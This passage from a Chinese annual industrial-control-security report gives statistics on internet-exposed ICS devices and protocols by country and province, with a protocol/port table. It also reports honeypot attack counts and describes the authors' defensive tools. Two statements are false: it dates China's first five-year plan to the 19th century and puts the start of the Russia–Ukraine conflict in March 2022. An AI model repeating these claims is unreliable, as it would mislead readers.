基本接近末流发达国家的水平。波兰的工业化程度很高,是欧盟第六大 工业强国,在波兰的诸多工业产业中,以制造业的表现最为突出。据波兰中央统计局发 布的数据, 自 2022 年年初,波兰的工业产值一直以每月两位数的速度在增长。通过图 5-3 可以看到,在波兰所暴露的协议中,Modbus 协议的数量居于首位。Modbus 协议由 于其公开免费,部署较为简单,自问世以来受到了诸多供应商的青睐,但由于其缺乏认 证加密等机制,Modbus 协议被广泛使用的同时,也为波兰工业控制系统的安全性带来 了巨大的风险。 图 5-3 波兰工控协议暴露数量和占比(数据来源“谛听”) 综上,相较于 2021 年,美国政府在发展工业的同时,更加重视国家工控系统安全 性的问题,2022 年暴露的工控设备数量略有下降。而波兰由于汽车制造业的繁荣发展, 国家 GDP 增长的同时暴露的工控设备数量也大幅增长,这势必会给国家的后续健康发 展埋下一定的隐患。 5.2 国内工控设备暴露情况 2022 年中国暴露的工控设备数量排全球第二。近几年来,中国的产业结构不断优化 升级,工业互联网发展迅速,实体经济也在逐步转型升级中。下面详细分析一下国内工 控设备暴露情况。 在全国暴露工控设备数量的条形图 5-4 中可以直观的看出江苏省的工控设备暴露数 量跻身至全国首位,与去年相比,多省的工控设备暴露数量都有了很大程度的增长。2021 年由于新冠疫情的肆虐,全国很多地方停工停产,国内工控设备暴露数量也随之减少。 2022 年在政策稳步推动、经济企稳复苏及企业数字转型需求增加等因素交织影响下,中 国工业互联网市场继续保持稳定增长,工业化与信息化在高层次进行了深度融合,国内 工控设备暴露数量相比 2021 年有了爆发式增长。 图 5-4 国内各地区工控设备暴露数量(数据来源“谛听”) 2022 年,江苏省是暴露工控设备数量最多的省份。据中国经济新闻网报道,江苏省 2022 年信息化和工业化融合发展水平指数达到 66.4 ,年平均增速 3%左右,较 2022 年 全国平均水平 59.6 高出 11.4% 。发达的工业体系是江苏省实现信息化和工业化的基础。 近年来,江苏立足制造业优势,坚持“ 实体强基” ,先后出台《关于深化“互联网+先进制 造业”发展工业互联网的实施意见》《江苏省制造业智能化改造和数字化转型三年行动 计划》等文件,把工业互联网创新工程作为战略性任务,融入到制造业数字化转型全过 程。制定实施《江苏省加快推进工业互联网创新发展三年行动计划(2021—2023 年)》 等文件,推进“数实融合”发展[3] 。江苏省多年来一直以两化(信息化、工业化)融合为行 为指南,实现了多个行业智能化改造以及数字化转型,其正以工业互联网、大数据中心、 5G 基站等新基建夯实数据基底,着力打造领先世界的工业互联生态圈。 2022 年,台湾地区工控设备暴露数量依然名列前茅,位列全国第二。台湾工业体系 发展完善且依然在全国各地区中处于领先的位置,其与大陆的交流合作也十分密切。 2022 年九月,两岸工业互联网融合发展研讨会在昆山举办,会上聚焦“产业升级”展开交 流,助力双方合作共赢。近年来,大陆在工业互联网、大数据以及 5G 基站等新基建方 面有着坚实的基底,而台湾在集成电路等领域也积攒了雄厚的实力,双方的交流合作有 利于社会数字化转型和智能化改造,推动工业互联网在更广范围、更深程度、更高水平 上融合创新。 广东 2022 年工控设备暴露数量排全国第三。近年来,广东深化工业互联网国家示 范区建设,推进工业化和信息化深度融合成效显著,工业互联网相关企业数量也位居全 国前列。据羊城新闻晚报报道,截至 2022 年 6 月底,广东省累计推动 2.25 万家规上工 业企业运用工业互联网数字化转型,带动 65 万家中小企业“上云用云” 。从制造业强省 到数字化强省,广东一直走在全国前面,广东的工业互联网企业也在加快全球化布局, 输出积累的数字化转型经验。 长江三角洲地区工控设备暴露数量的排名变动不大。随着经济的逐步复苏,长三角 地区(江苏、安徽、浙江和上海)正利用区位和资源优势,加速推进长三角工业互联网 一体化发展,为全国国际化、区域联动发展等方面进行了前沿探索。2022 年 11 月,为 加快构建长三角工业互联网体系,促进长三角产业转型升级,长三角工业互联网峰会在 合肥市奥体中心隆重召开。此次大会全面展示了长三角区域工业互联网的最新发展成果, 推动长三角工业互联网一体化发展再升级、再提速。把握重大战略机遇,加快发展工业 互联网,是长三角实现制造业高质量发展、构筑工业竞争新优势的必然选择[4]。 北京今年排名相较去年有所下降,作为中国首都,北京经转人流量过多,疫情时常 反复,对工业互联网的发展还是产生了一定的影响。并且现阶段的北京,绿色发展是基 础,工业产业大量转移出去,使暴露的工控设备数量与其他地区相比显得相对较少。 与 2021 年工控设备暴露数量相比,辽宁 2022 年工控设备暴露的数量反超黑龙江和 吉林,成为东北地区工控设备暴露数量最多的省份。东北地区(辽宁、吉林、黑龙江) 作为中国工业的摇篮,在我国发展史上写下了光辉灿烂的篇章。辽宁省于 2022 年 11 月 举办了全球工业互联网大会,此次大会对于加快工业互联网创新发展、推动数字辽宁智 造强省建设取得新突破,具有重大意义。据辽宁省政府新闻办报道,辽宁省认真贯彻习 近平总书记关于工业互联网创新发展的重要指示精神,把工业互联网创新发展作为助推 经济高质量发展的重要力量,出台了《工业互联网创新发展三年行动计划》等政策文件, 设立了省级专项资金,加快推动制造业数字化转型,使得辽宁省工业互联网进入了新的 发展阶段[5] 。中国工业互联网研究院院长鲁春丛于此次大会上发表了《全球工业互联网 创新发展报告》讲话,他指出,未来五年将是工业互联网从起步探索转向快速发展的重 要阶段,也是我国推进新型工业化,加快建设制造强国、网络强国、数字中国的关键时 期[6] 。当前,随着技术的不断发展,实现工业化和信息化高水平融合已是中国特色新型 工业化道路的集中体现,工业互联网为产业数字化、网络化以及智能化发展提供了新的 机遇。 2022 年,香港排名虽然较去年有所下降,但暴露设备数量却上升了将近三倍。香港 以往是一个主要以服务业为主的经济体,所以香港的工控设备暴露数量并不能与广东以 及台湾等地相比。但近年来,随着 5G 专网工业模组成本的降低,香港积极资助 5G 技 术应用,多方面推动 5G 发展,完善 5G 网络覆盖,开展 5G 企业网络以及 5G 工业互联 网的融合应用以及部署,推动香港新型工业化的发展。香港抓住机遇,积极融入国家发 展大局,为中国独立自主建设工业互联网络起到了表率作用。 5.3 国内工控协议暴露数量统计情况 图 5-5 国内工控协议暴露数量和占比(数据来源“谛听”) “谛听” 团队统计了国内暴露的各协议总量,从图 5-5 中可以看出 Modbus协议在网 络中暴露的数量最多,领先于第二位的 Moxa Nport 。Modbus 是一种串行通信协议,是 Modicon 公司(现在的 Schneider Electric)于 1979 年为使用可编程逻辑控制器(PLC) 通信所发行的。在我国,Modbus 协议已经被纳入国家标准 GB/T19582-2008。虽然 Modbus 协议支持多个设备在同一网络中的透明通信,帧格式紧凑、简洁,兼容多种电气接口。 且 Modbus 凭借易部署、限制少、门槛低的优点,成为工业领域通信协议的业界标准, 是国内工业电子设备之间最常用的连接方式。然而该协议缺乏有效的认证和加密手段, 亦缺少对功能码的有效管理,因此造成许多安全问题,可见该协议排在国内暴露协议第 一位属情理之中。 Moxa Nport,Moxa 串口服务器专为工业应用而设计,Moxa Nport 是其中的一个串 口服务器系列,在世界范围内具有广泛的应用。不同配置和组合的服务器能满足多种工 业场景的需要,因此适用性强。 Tridium Niagara Fox,Tridium Niagara Fox 被广泛应用于国家的智能建筑、设施管理、 安防、电力、空调设备等领域。Tridium 是 Honeywell 旗下独立品牌运作的子公司,开 发了软件框架“Niagara Framework”。基于 Niagara 框架,客户可以开发专有产品和应用, 也可以集成、连接各种智能设备和系统,不受生产厂家和协议的影响,在实现设备互联 的同时可以通过网络进行实时控制和管理。NiagaraAX 平台时至今日已经整合了多种系 统,例如建筑、园区的基础硬件设施、安防系统、访客管理、电网系统、设施管理等。 NiagaraAX 把这些设备和系统进行连接,使用 Tridium Niagara Fox 协议通信,具有极高 的使用价值,因此排在第三位亦在意料之中。 EtherNet/IP 是由 ODVA(Open DeviceNet Vendor Association)指定的工业以太网协 议,它使用 ODVA 已知的应用层“通用工业协议”(CIP™ ) 。CIP 是一种由 ODVA 支持 的开放工业协议,它被使用在例如 EtherNet/IP 等串行通信协议中。美国的工控设备制 造商 Rockwell/Allen-Bradley 对 EtherNet/IP 进行了标准化处理,其他的厂商也在其设备 上支持了 EtherNet/IP 协议。当前,EtherNet/IP 的使用已经十分广泛,然而协议层面的 安全问题仍值得我们重视。 BACnet 是用于楼宇自动化和控制网络的简短形式的数据通信协议,亦是主要行业 供应商产品中常用的自动化和控制协议之一,其目的是提高服务供应商之间的互操作性, 减少因设备厂商的专有系统所造成的使用限制问题。此协议的泄露往往是由用户缺乏安 全意识导致,意味着该 IP 对应的行业供应商的产品设备已经暴露,因此容易造成用户 的网络安全隐患和财产损失。 5.4 俄乌冲突以来暴露设备数量变化 俄乌冲突开始于 2022 年三月份, 目前俄罗斯和乌克兰的紧张局势依然在持续中, 近期的冲突仍然在加剧。发动网络战能够削弱一个国家的通信能力以及战场感知能力, 而且随着军队依靠软件,利用获取的情报在战场上进行部署,这场竞赛变得越来越重要。 为了能够了解俄罗斯和乌克兰的工控领域的相关状况,“谛听” 网络安全团队对此进行了 持续关注。表 5-2 列举了俄罗斯、乌克兰暴露工控设备的相关协议。 表 5-2 俄罗斯、乌克兰暴露工控设备相关协议 探测发现协议 探测端口 协议概述 Siemens S7 102 西门子通信协议 Modbus 502 应用于电子控制器上的一种通用语言 ilon Smartserver 1628 智能服务器协议 Moxa Nport 4800 Moxa 专用的虚拟串口协议 XMPP 5222 基于 XML 的可扩展通讯和表示协议 AMQP 5672 提供统一消息服务的应用层标准高级消息队列协议 IEC 60870-5-104 2404 IEC 系列协议 同时,“谛听” 网络安全团队每月都会收集俄乌暴露的设备数量情况,根据收集的数 据,得到了俄罗斯和乌克兰自冲突爆发以来暴露的设备的数量变化情况。 从图 5-6 冲突前后俄罗斯各协议暴露设备数量来看,AMQP 协议从冲突前到冲突开 始持续到 8 月份变化幅度较大,总体呈现先降后升的趋势,后续趋于平缓;Siemens S7 协议从冲突前至 3 月份呈现下降趋势,之后整体趋势呈现先升后降;IEC 60870-5- 104 协议整体变化趋势与 Siemens S7 协议相同,但在 11 月至 12 月份突然呈现迅速上升的趋 势,猜测与 11 月发生了工控事件有关;ilon Smart -server 协议在 5 月份变化较大,10 月份之后呈现下降趋势;其它协议整体的变化幅度不大。 图 5-6 俄罗斯暴露设备数量变化(数据来源“谛听”) 图 5-7 乌克兰暴露设备数量变化(数据来源“谛听”) 从图 5-7 冲突前后乌克兰各协议暴露设备数量变化情况中我们可以看到,首先 AMQP、Modbus、Moxa Nport、XMPP 以及 Siemens S7 等协议从冲突前到 4 月份变化较 大,猜测是期间发生了重大的工控事件导致的。随后,除 AMQP 以外的四种协议在 10 月到 12 月份发生了小幅度的变化;其它两种协议没有变化。 总之,从上面两幅图可以看出,俄乌暴露设备的数量变化较大的月份主要集中在 3 月至 5 月以及 10 月至 12 月这几个月份,猜测其变化趋势与当时发生的工控事件有直接 或间接的关系,表 5-3 列举自俄乌冲突以来与之相关的主要的工控事件。 表 5-3 俄乌冲突相关的主要的工控事件 如今,工业互联网的蓬勃发展给工业控制领域带来了新的发展机遇,与此同时也带 来了新的网络安全问题。蜜罐技术是增强工控系统网络安全防护能力的有效方法,东北 大学“谛听” 网络安全团队对工控蜜罐技术展开了研究。经过多年努力,“谛听” 网络安全 团队研发出了可以模拟多种工控协议和工控设备并且全面捕获攻击者流量的“谛听” 工 控蜜罐。目前,“谛听”蜜罐支持 11 种协议,且已经部署在多个国家和地区。“谛听” 网络 安全团队在 2021 年进一步改进了基于 ICS 蜜网的攻击流量指纹识别方法(以下简称“识 别方法” ),有效地提高了识别各类针对工控网络的攻击流量的效率,并根据不同类型 的攻击流量制定出更加有效的工控系统防御措施。 6.1 工控蜜罐全球捕获流量概况 “谛听”工控蜜罐可支持 ATGs Devices、DNP3、Modbus、EGD 等 11 种协议,其中, EGD 协议是今年新增的协议。目前“谛听”工控蜜罐已经部署在了中国华北地区、中国华 南地区、东欧地区、东南亚地区、美国东北部等国内外多个地区。截止到 2022 年 12 月 31 日,“谛听”蜜罐收集到大量攻击数据。图 6- 1、6-2 和 6-3 中展示了经过统计和分析后 的数据。下面将对各个图表进行简要解释说明。 图 6-1 蜜罐各协议攻击量(数据来源“谛听”) 图 6- 1 展示了不同协议下各蜜罐受到的攻击量。从图中可以看出,ATGs Devices 、 DNP3 和 Modbus协议下蜜罐所受攻击量仍然保持在前三名。但与 2021 年相比,曾大幅 领先的 Modbus协议被ATGs Devices协议和 DNP3 协议超越,降至第三名,ATGs Devices 协议从第二名跃居第一,这表明 ATGs Devices 协议受到的关注大幅度增加。另外,今 年新增的 EGD 协议具有简便高效的特性,其所受攻击量位于第六位。这些变化表明工 控系统协议在不断发展,攻击者的攻击方向也在不断调整和变化。前四种协议所受的攻 击量总计占比接近 70%,这表明这些协议比较受攻击者的关注,因此工控网络安全研究 人员应根据需求情况,加强这些协议下设备的网络安全防护。 “谛听” 网络安全团队对收集到的攻击数据的 IP 来源进行分析,得到了来自不同国家 和地区攻击源的数量统计,图 6-2 仅展示攻击量最多的 10 个国家。从图中可以看到, 美国的攻击量遥遥领先,甚至超过了其他 9 个国家攻击量的总和;排在第二的国家是荷 兰,其攻击量虽远少于美国但也处于较高的数量水平,这在一定程度上表明两国攻击者 对本国工控设备的高度关注。英国、俄罗斯和德国的攻击量相差不大,分别位于第三到 五位。从排名第六位的斯洛伐克开始,攻击量显著减少。 图 6-2 其他各国对蜜罐的攻击量 TOP10(数据来源“谛听”) 对中国国内流量来源的 IP 地址进行相关分析,列出了 IP 流量的省份排名,如图 6-3 所示,这里仅展示前十名。可以看到,来自中国华北地区的 IP 流量较多,北京同去年 一样排在了第一位,体现出其作为首都在网络安全支撑工作方面的领先地位。山西省跃 升至第二位,浙江省由去年的第五名上升至第三名,由此可见山西省和浙江省在网络安 全方面做出的努力。 图 6-3 中国国内各省份流量(top10)(数据来源“谛听”) 2022 年,“谛听” 网络安全团队调整了已部署的蜜罐,拓展了蜜罐可支持协议的范围, 未来将会与更多高新技术应用进行融合,相关的研究将会持续推进。 6.2 工控系统攻击流量分析 “谛听” 团队首先对来自不同地区的蜜罐捕获的攻击流量数据进行初步分析,然后使 用识别方法对 Modbus 、Ethernet/IP 两个应用范围较广的协议进行攻击流量检测,并从 每个协议在不同地区部署的蜜罐中选择最具代表性的两个地区进行攻击流量数据统计。 针对 Modbus协议,我们选择了中国华东地区和美国东海岸地区部署的蜜罐,统计 结果如表 6- 1 、6-2 所示。 表 6- 1 中国华东地区 Modbus协议蜜罐捕获攻击总量来源 TOP10(数据来源“谛听”) 攻击源 攻击总量 攻击 IP 数量 IP 平均攻击数 Netherlands 5422 85 63.8 United States 2008 401 5.0 China 573 59 9.7 United Kingdom 395 8 49.4 Germany 72 10 7.2 Japan 62 3 20.7 Russia 61 14 4.4 Belgium 48 34 1.4 Canada 34 21 1.6 Greece 15 12 1.3 表 6-2 美国东海岸地区 Modbus协议蜜罐捕获攻击总量来源 TOP10(数据来源“谛听”) 攻击源 攻击总量 攻击 IP 数量 IP 平均攻击数 United States 865 243 3.6 Netherlands 282 11 25.6 Germany 183 19 9.6 China 85 12 7. 1 United Kingdom 74 7 10.6 Singapore 42 3 14.0 Belgium 38 28 1.4 Canada 22 18 1.2 Ukraine 9 1 9.0 Japan 8 1 8.0 由表 6- 1、6-2 可知,在攻击总量来源方面,荷兰在中国华东地区的攻击总量显著高 于其他国家,且远高于去年同期数据。在美国东海岸地区 Modbus协议蜜罐捕获攻击总 量中,美国仍然保持第一位,且与去年相比呈现上升趋势。在攻击 IP 数量方面,美国 仍在两个地区中均排名第一,并远超于其他国家。以表 6-2 为例,美国在美国东海岸地 区的攻击 IP 数量约是排名第二的比利时的 8.7 倍。在 IP 平均攻击数方面,荷兰在两个 地区中均处于第一位。 针对 Ethernet/IP 协议,我们选择的是中国华南地区和美国西海岸地区部署的蜜罐, 统计结果如表 6-3 、6-4 所示。 表 6-3 中国华南地区 Ethernet/IP 协议蜜罐捕获攻击总量来源 TOP10(数据来源“谛听”) 攻击源 攻击总量 攻击 IP 数量 IP 平均攻击数 United States 452 119 3.8 China 89 29 3. 1 Kazakhstan 55 3 18.3 Netherlands 19 6 3.2 Germany 8 6 1.3 Japan 6 1 6.0 India 2 1 2.0 Ukraine 1 1 1.0 United Kingdom 1 1 1.0 Vienna 2 1 2.0 表 6-4 美国西海岸地区 Ethernet/IP 协议蜜罐捕获攻击总量来源 TOP5(数据来源“谛听”) 由表 6-3 、6-4 分析可知,在攻击总量来源和攻击 IP 数量方面,美国在两个地区中 均位列第一,且远超其他国家。在 IP 平均攻击数方面,哈萨克斯坦在中国华南地区排 名第一,是排名第二的日本的 3.05 倍。美国在美国西海岸地区的 IP 平均攻击数最高。 通过上述统计的 Modbus协议蜜罐和 Ethernet/IP 协议蜜罐捕获的攻击总量来源数据, 可以看出 Modbus协议蜜罐受攻击的总次数远大于 Ethernet/IP 协议蜜罐,推测其原因为 Modbus 协议具有公开免费、开源工具多、部署和维护简单等特点,从而当前应用范围 更广泛,因此所受攻击更多。此外,在确定攻击源的情况下,排名前三的国家的攻击方 来源数占总数的近 90%,可能的原因包括:一是由于这些国家的公司提供的云服务器被 租赁用于长期扫描;二是由于这些国家的安全行业从业者及研究人员较多,相关研究行 为较活跃;三是由于这些国家存在大量恶意攻击团队,其对互联网进行的恶意攻击被谛 听部署的蜜罐有效诱捕。 6.3 工控系统攻击类型识别 “谛听” 网络安全团队提出一种基于 ICS 蜜网的攻击流量指纹识别方法,针对 Modbus、 Ethernet/IP 协议蜜罐捕获的流量数据进行了攻击类型识别。图 6-4 和图 6-5 分别显示了 对 Modbus 和 Ethernet/IP 协议蜜罐捕获的攻击流量的攻击类型识别结果。其中的“E”表 示 Ethernet/IP 协议,其中的“M”表示 Modbus 协议,由于国内和国外的蜜罐程序不同,“E” 和“E'” 同一编号表示不同的攻击类型,“M”和“M'” 同一编号表示不同的攻击类型,环形 图中各部分为不同的攻击类型。 图 6-4 Ethernet/IP 协议攻击类型占比图(数据来源“谛听”) 图 6-5 Modbus 协议攻击类型占比图(数据来源“谛听”) Ethernet/IP 协议蜜罐部署地区为中国华南地区和美国西海岸,两地区的经济发展迅 速,高新技术产业发达,各种网络活动较频繁。蜜罐部署在经济科技发达地区,便于收 集更多、更详细的攻击信息。由图 6-4 可知,中国华南地区的 Ethernet/IP 协议蜜罐捕获 的攻击流量主要采用的攻击类型为 E- 1、E-2、E-3,其中 E- 1 约占所捕获总流量的一半。 美国西海岸地区的 Ethernet/IP 协议蜜罐捕获的攻击流量采用 E'- 1 、E'-2 、E'-3 三种攻击 类型,其中,E'- 1 以 54%的高占比成为该地区 Ethernet/IP 协议蜜罐捕获的攻击流量的主 要攻击类型。由此可见以上攻击类型是对 Ethernet/IP 协议蜜罐进行攻击的主要手段。 Modbus 协议蜜罐部署地区为中国华东地区和美国东海岸,二者均为工业发达地区, 蜜罐部署在该地区便于伪装隐藏,且易于收集更多的攻击信息。由图 6-5 可知,中国华 东地区的 Modbus协议蜜罐捕获的攻击流量主要采用的攻击类型为 M- 1、M-2,其中 M- 1 占到了 41%。美国东海岸 Modbus协议蜜罐捕获的攻击流量主要采用的攻击类型为 M'- 1、 M'-2 、M'-3 ,且相互之间占比差距较小。由此可见以上攻击类型是对 Modbus 协议蜜罐 进行攻击的主要手段。本团队对 Ethernet/IP 和 Modbus 的 ICS 网络流量进行了解析、建 模、评估,但其中还存在部分未知的攻击类型,针对未知的攻击类型还需进一步的研究, 以便提供有效的 ICS 流量检测与攻击预警,评估其潜在的攻击意图,制定针对性的防御 措施。 6.4 工控蜜罐与威胁情报数据关联分析 近年来,网络安全风险持续向工业控制领域扩散,工控网络也逐渐成为网络安全的 重要一环。当前工控攻击具有类型丰富、途径泛滥、追踪困难等特点,传统的被动式防 御手段“老三样”——防火墙、查杀病毒、入侵检测以及针对单点的攻击取证与溯源技术 难以应对高级持续性威胁(APT)、新型高危漏洞等复杂安全威胁,而以威胁情报(TI) 为基础的分析技术能够收集整合全球范围内的分散攻击与威胁,进而采取智能化的攻击 响应措施,实现大规模网络攻击的防护与对抗,本团队也对 2022 全年采集到的大量威 胁情报及蜜罐数据进行了关联分析。 由 “ 谛 听 ” 网 络 安 全 团 队 开 发 并 于 2021 年 2 月 上 线 的 威 胁 情 报 搜 索 引 擎 (https://www.TItecting.com)是基于“谛听”威胁情报中心而研发的应用服务。威胁情报 中心存有海量威胁情报数据,提供全面准确、内容详细的相关决策支持信息,为行业系 统安全提供保障。面对复杂的攻击形式和不断迭代的攻击手段,建立完善的威胁情报搜 索引擎刻不容缓,旨在为工业、企业、组织以及个人提供更加全面的情报信息,打造以 威胁情报平台为基石的网络安全空间。 2022 年“谛听”蜜罐和威胁情报中心均采集到大量新数据,为探寻数据间潜在的相关 性,“谛听” 团队计算威胁情报数据和蜜罐数据的重叠部分,并根据攻击类型的不同将数 据分为 5 类。其中包括代理 IP(proxy)、命令执行与控制攻击(command execution and control attacks)、恶意 IP(reputation)、垃圾邮件( spamming)和洋葱路由(tor)。 每种类型数据与蜜罐数据重叠部分在二者中的占比如图 6-6,本团队对该图的分析如下。 图 6-6 威胁情报与蜜罐数据关联占比(数据来源“谛听”) 图 6-6 中威胁情报数据来源于“谛听”威胁情报中心,该系统所记录的数据为安全网 站或安全数据库中的情报数据,本团队根据情报数据攻击类型不同分别记录在不同的数 据表中。而直接在部署在国内外网络节点上的工控蜜罐通过模拟暴露在互联网上的工业 控制设备,开放设备对应工业网络协议端口吸引攻击者,在记录每一次攻击者的攻击信 息的同时,监听捕捉流经此节点的网络流量,以保证攻击信息的真实性与可用性。因此, 图中威胁情报数据与工控蜜罐数据有重叠的部分表示情报中心收集到的 IP 地址确实发 生了工控攻击,这可以让系统更有针对性的对攻击进行防御。下面对具体的数据进行分 析。 首先,与 2021 年类似,2022 年占蜜罐数据最多的攻击类型依然是“恶意 IP” ,达到 了 6.737‰(经过 ln 函数计算后),本团队认为发起代理 IP 、命令执行与控制攻击、垃 圾邮件和洋葱路由攻击的攻击者 IP 在主观上均可以标识为“恶意 IP”,这可能是“恶意 IP” 的关联占比最高的原因,未来工控产业可能需要更加严格地细分“恶意 IP” 的认证标准, 将工控网络中的“恶意 IP”概念与其他网络作准确的区别。 其次,与 2021 年仅“洋葱路由”在蜜罐数据中的关联占比排名第二不同的是,今年“命 令执行与控制攻击” 、“垃圾邮件”与“洋葱路由” 的关联占比相差不大,可以视为紧随“恶 意 IP”之后均排名第二。本团队猜测,基于 Tor 网络协议内部固有的脆弱性特征且目前 相关研究并不成熟的现状,工控系统在设计时可能就会避免部署 Tor 网络结构,这就使 得工控攻击者失去攻击目标而采取其他类型的攻击方式,其中可能就包括“命令执行与 控制攻击”与“垃圾邮件” ,当然工控系统安全人员也不能对“洋葱路由”攻击掉以轻心。 最后,通过“代理 IP”进行攻击的情报数量在蜜罐数据中占比最小,本团队猜想:代 理 IP 是一种特定的 IP 地址,用户购买代理 IP 并不代表可以随意使用,一般情况下会有 特定的管理人员对代理 IP 进行管理,一旦发现某用户频繁通过该 IP 进行攻击,管理人 员会对该 IP 进行回收,不再授予使用权;同时目前针对“代理 IP”攻击的防护方案较为 成熟,攻击者倾向于使用多种方式对工控系统进行立体攻击。 6.5 工控网络探针 6.5.1 数据处理之 Honeyeye 随着网络信息技术的飞速发展,互联网与工业融合创新不断推进,通信、金融、交 通、能源等基础行业设施日益依赖于网络,并逐步与公共互联网连接。随之而来的是工 业领域逐渐成为网络攻击重灾区,工业互联网安全防护急需加强与提升。 网络探针是一个用于捕获、分析网络数据包的组件,在确保网络信息产业的安全可 控中有着重要的意义。由“谛听” 网络安全团队研发的 Honeyeye 工控网络探针支持对 30 余种工控协议解析的同时,亦可进行数据预处理。 分析网络特征与行为是实现工控安全中一个重要的环节,因此获得有效且易于分析 的数据至关重要。PCAP 文件被广泛应用于网络流量存储,但因其文件格式是二进制格 式,可读性较差。相较于现有的网络流量捕获系统(如 TCPDump、Windump 和 Wireshark) 只将捕获的原始二进制数据保存在 PCAP 文件中,Honeyeye 能够将捕获的数据转换为 所需格式对外输出。 图 6-7 不同流量上 Honeyeye 和 Wireshark 解析时间对比(数据来源“谛听”) 从图 6-7 可以看出,相较与主流的网络流量解析工具 Wireshark,本团队所研发的探 针 Honeyeye 解析速度更快。Honeyeye 可以捕获流量以及导入 PCAP 文件作为输入进行 解析,输出结果以 Json格式保存及传输到远端服务器,从而易于人阅读和编写,同时也 易于机器解析,为下一步分析提供支撑。此外,Honeyeye 可以作为插件被其他框架所 整合,从而提高 Honeyeye 的可用性。 未来,本团队将继续致力于 Honeyeye 的改进,包括但不限于改进框架跨不同系统 和网络运行的能力,以及收集防火墙日志和攻击者击键操作等其他信息的能力。 6.5.2 网络安全态势可视化 利用 Honeyeye 输出的数据进行网络安全态势可视化为用户监控网络环境、发现网 络异常、定位故障节点等提供了便利。 本团队所开发的网络安全态势可视化系统中主要包括设备监测、流量统计以及带宽 变化等模块。其中设备监测对 CPU 和内存使用率、设备 IP 以及部署时间等信息进行展 示,能够帮助用户掌握系统运行状态,减少突发事件,一定程度上提高运维效率。流量 统计中的总体流量统计有助于用户从宏观上了解近期流量变化;而实时流量统计能够展 示每秒的流量变化趋势,并显示上下限之外的异常流量,以便定位异常。重要网络设备 的带宽变化可以有效检测可疑网络活动,进而为网络安全提供保障。 目前,网络安全态势可视化还是一项刚刚发展的技术,通过可视化图形方式将网络 中蕴含的态势展示给用户,方便用户对网络异常的检测、预防及处理。未来,基于大数 据和人工智能的网络安全态势需要进一步探索,从而获得并展示更多、更深层次的数据, 最终协助网络安全管理人员实现网络安全智能化管理。 随着近年来技术的发展,工业互联网的应用越来越广泛。工业互联网(Industrial Internet)是新一代信息通信技术与工业经济深度融合的新型基础设施、应用模式和工业 生态,通过对人、机、物、系统等的全面连接,构建起覆盖全产业链、全价值链的全新 制造和服务体系,为工业乃至产业数字化、网络化、智能化发展提供了实现途径,是第 四次工业革命的重要基石。工业互联网不是互联网在工业的简单应用,而是具有更为丰 富的内涵和外延。它以网络为基础、平台为中枢、数据为要素、安全为保障,既是工业 数字化、网络化、智能化转型的基础设施,也是互联网、大数据、人工智能与实体经济 深度融合的应用模式,同时也是一种新业态、新产业,将重塑企业形态、供应链和产业 链[7]。 近年来,工业化与信息化的深度融合使得互联网与工业控制系统相结合,改变了传 统工业控制系统封闭的环境。在享受互联网便利的同时,工业领域也同样开始面临互联 网的安全威胁。远在千里之外的黑客可以通过互联网,攻击原本封闭的工业控制系统, 这使得网络型攻击可以直达生产现场,造成生产中断甚至威胁工作人员的生命安全。例 如 2022 年 1 月 29 日,位于荷兰阿姆斯特丹和鹿特丹、比利时安特卫普的几处港口因遭 到勒索软件的攻击,石油装卸和转运受阻,至少有 7 艘油轮被迫在安特卫普港外等候, 无法靠港。同月,黑客组织勒索攻击铁路相关基础设施,试图谋求政治诉求。网络攻击 带来的巨大利益诉求让工业领域面临严峻的安全挑战。 目前的工业互联网安全技术大体分为安全防护技术、安全评测技术、安全监测技术。 首先,工业互联网安全防护技术是对工业互联网各层级部署边界控制、身份鉴别与访问 控制等的技术措施,是工业互联网安全技术的核心。工业互联网安全评测技术是采取技 术手段对工业互联网各层级的安全防护对象进行测试和评价,了解其安全状态,从而增 强防护能力,主要包括漏洞扫描、漏洞挖掘、渗透测试等技术。工业互联网安全监测技 术就是通过技术手段实现对各层级的安全威胁的发现识别、理解分析、响应处置,主要 包括安全监测审计、安全态势感知等关键技术。随着相关安全技术的发展,未来工业互 联网行业的安全性会愈来愈好。 据目前情况来看,我国发展工业互联网有优势也有缺点,可以说是机遇与困难并存。 从优势上来讲,一是我国有着一定的工业基础, 自 19 世纪第一个五年计划起,我国就 开始了工业化建设,这也让我国工业门类齐全;二是市场需求充足,我国作为世界第二 大经济体,有着极大的市场需求,很多东西都能自产自销;三是拥有相应的网络配置以 及政策倾向,我国 5G 的研发处于世界领先水平,5G 的覆盖率使得我们拥有很好的网络 配置。与此同时,我国政策一直都是科技导向,发展以工业互联网为基础的高新技术产 业。四是我国人口众多,14 亿的人口基数能让我们拥有庞大的人才资源储备。相应的, 有优势就有缺点,一是思想观念上的挑战,当今社会科学技术日新月异,这要求我们从 业者有破釜沉舟的勇气,有敢为天下先的担当,从业者要敢于走出舒适圈,将互联网融 于传统工业企业中,积极响应国家号召,适应当前飞速发展的时代。二是商业模式的挑 战,工业互联网相对于传统工业还是小众行业,国内目前还没形成统一的评价标准,社 会各界认知不统一;三是关键技术的挑战,我国工业互联网平台产业空心化问题是一道 迈不过的难关,目前国内很多工业互联网平台都是基于国外基础产业体系而建立的。虽 然我国很多技术已实现弯道超车,但仍有许多被卡脖子的技术需要攻克。核心技术必须 掌握在自己手里,这是不可退步的原则问题。 7.1 工业互联网与智能制造 智能制造与工业互联网二者密不可分 ,相辅相成 。根据工业互联网产业联盟 (Allianceof Industrial Internet ,AII) 发布的《工业互联网术语与定义》 ,智能制造 (Intelligent Manufacturing ,IM)包含了智能制造技术和智能制造系统两方面。而智能 制造的实现主要依托两个基础能力,一个是工业制造技术,主要包括了先进装备、先进 材料和先进工艺等,工业制造技术是决定制造边界与制造能力的根本;另一个就是工业 互联网。工业互联网包括智能传感控制软硬件、新型工业网络、工业互联网平台等,是 充分发挥工业装备、工艺和材料潜能,提高生产效率、优化资源配置效率、创造差异化 产品和实现服务增值的关键[8]。 图 7- 1 工业互联网与智能制造的关系[9] 工业互联网是实现智能制造的基础,工业互联网主要通过五大技术来支持实现智能 制造,包括工业软件技术、工业网络技术、工业平台技术、工业安全技术、工业智能技 术[9]。智能制造依托工业互联网发展的同时,反过来也推动着工业互联网的改造与升级。 制造自动化、智能化的宏伟目标,也在不断促进着工业互联网朝高速度、低延迟的方向 发展。 自工业互联网相关概念被提出以来,实现智能制造就一直是人们谈论的热点话题。 而如今随着人工智能、大数据等新兴互联网技术的突破,更是为智能制造的实现提供了 新的可能性。2021 年 12 月,工业和信息化部、国家发展改革委、教育部、科技部、财 政部、人力资源社会保障部、市场监管总局、国资委等八部门联合发布了《“十四五”智 